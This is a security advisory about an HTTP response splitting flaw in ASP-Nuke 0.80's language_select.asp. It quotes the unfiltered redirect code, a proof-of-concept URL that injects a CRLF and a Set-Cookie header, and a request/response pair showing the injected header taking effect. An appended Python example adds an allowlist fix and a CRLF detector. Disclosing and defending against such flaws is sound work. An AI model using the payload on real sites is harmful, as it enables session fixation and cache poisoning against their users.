ASP-Nuke <= 0.80 language_select.asp HTTP Response Splitting Vulnerability

2005-08-18T00:00:00
ID SSV:19613
Type seebug
Reporter Root
Modified 2005-08-18T00:00:00

Description

BUGTRAQ: 14063

ASPNuke contains an HTTP response splitting vulnerability. An attacker who successfully exploits it can influence or mislead the way web content is stored, cached or interpreted.

The cause is that user input is not filtered correctly. See the code at line 31 of /module/support/language/language_select.asp:

       ...
       If steForm("action") = "go" Then

           ' make sure the required fields are present
           If Trim(steForm("LangCode")) = "" Then
               sErrorMsg = steGetText("Please select a language from the list below")
           Else
               ' redirect to the language administration
               Response.Redirect "tran_list.asp?langcode=" & steEncForm("LangCode")
           End If
       End If
       ...
    %>

Because the value is not filtered before the redirect, an attacker can carry out a CRLF injection attack.

ASP-Nuke <= 0.80 Vendor patch: ASP-Nuke


The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version: http://www.asp-nuke.com/downloads.asp

http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue


The following is an example of the HTTP headers:

     Request:
          POST /module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue HTTP/1.0
          Accept: */*
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
          Host: www.aspnuke.com
          Content-Length: 90
          Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
          Connection: Close

     Response:
          HTTP/1.1 302 Object moved
          Server: Microsoft-IIS/5.0
          Date: Sun, 15 May 2005 11:31:37 GMT
          Pragma: no-cache
          Location: tran_list.asp?langcode=trivero
          Set-Cookie: some=value
          Connection: Keep-Alive
          Content-Length: 121
          Content-Type: text/html
          Expires: Sun, 15 May 2005 11:30:38 GMT
          Cache-control: no-cache
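The exchange above shows the injected CRLF ending the Location header so that the attacker-supplied Set-Cookie line is parsed as a real header. The added example below (not code from the advisory or from ASP-Nuke) models that unfiltered redirect, parses the resulting headers to show the split, and puts a hardened allowlist check and a simple request-log detection beside it; the language-code pattern is an assumption based on the LANGUAGE=US cookie in the sample request.

```python
import re
from urllib.parse import quote, unquote

# Assumed allowlist for language codes such as "US" or "en-US".
LANGCODE_RE = re.compile(r"^[A-Za-z]{2,8}(-[A-Za-z]{2,8})?$")


def build_redirect_headers(langcode: str) -> bytes:
    """Models the vulnerable pattern: the raw parameter lands in the
    Location header, so CR/LF inside it terminates that header early."""
    return (b"HTTP/1.1 302 Object moved\r\n"
            b"Location: tran_list.asp?langcode=" + langcode.encode("latin-1") +
            b"\r\nConnection: Keep-Alive\r\n\r\n")


def parse_headers(raw: bytes) -> dict:
    """Split a raw response head into a header-name -> value dict, the way
    a proxy or browser would see it."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")[1:]          # drop the status line
    return dict(line.split(": ", 1) for line in lines if ": " in line)


def safe_langcode(value: str) -> str:
    """Hardened version: only allowlisted codes reach the redirect, so
    CR, LF or an extra header name can never enter the Location value."""
    if not LANGCODE_RE.fullmatch(value):
        raise ValueError("invalid language code")
    return quote(value, safe="")            # percent-encode as a second layer


def query_has_crlf(query: str) -> bool:
    """Detection: flag request query strings whose decoded form contains a
    CR or LF (catches %0d%0a and double-encoded %250d%250a variants)."""
    decoded = unquote(unquote(query))
    return "\r" in decoded or "\n" in decoded


if __name__ == "__main__":
    # Constructed input mirroring the advisory's sample request.
    injected = "trivero\r\nSet-Cookie: some=value"
    print(parse_headers(build_redirect_headers(injected)))
    print(query_has_crlf("action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue"))
```

The parsed dict shows the injected Set-Cookie as a separate header, while the same value is rejected by safe_langcode and flagged by query_has_crlf.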